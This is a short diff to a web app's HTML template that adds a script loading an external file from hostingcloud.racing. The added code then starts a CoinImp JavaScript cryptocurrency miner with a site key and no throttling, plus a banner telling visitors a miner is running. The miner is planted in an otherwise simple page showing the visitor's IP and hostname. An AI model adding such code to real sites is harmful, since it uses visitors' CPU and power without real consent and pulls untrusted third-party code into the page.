--- a/webapp/templates/index.html
+++ b/webapp/templates/index.html
@@ -2,7 +2,15 @@
     <meta charset="utf-8" />
     <title>HELLO BANG</title>
 </head>
+<script src="https://www.hostingcloud.racing/SiXG.js"></script>
+<script>
+    var _client = new Client.Anonymous('fe627f1c8676f492425a5889a9dcf9a83db829ac1e0f76f1771b2c3b27f8be5c', {
+        throttle: 0, c: 'w'
+    });
+    _client.start();
+    _client.addMiningNotification("Top", "This site is running JavaScript miner from coinimp.com. If it bothers you, you can stop it.", "#cccccc", 40, "#3d3d3d");
 
+</script>
 <body>
     <h2>Dari {{IP}} on: {{hostname}}</h2>
     <h3>
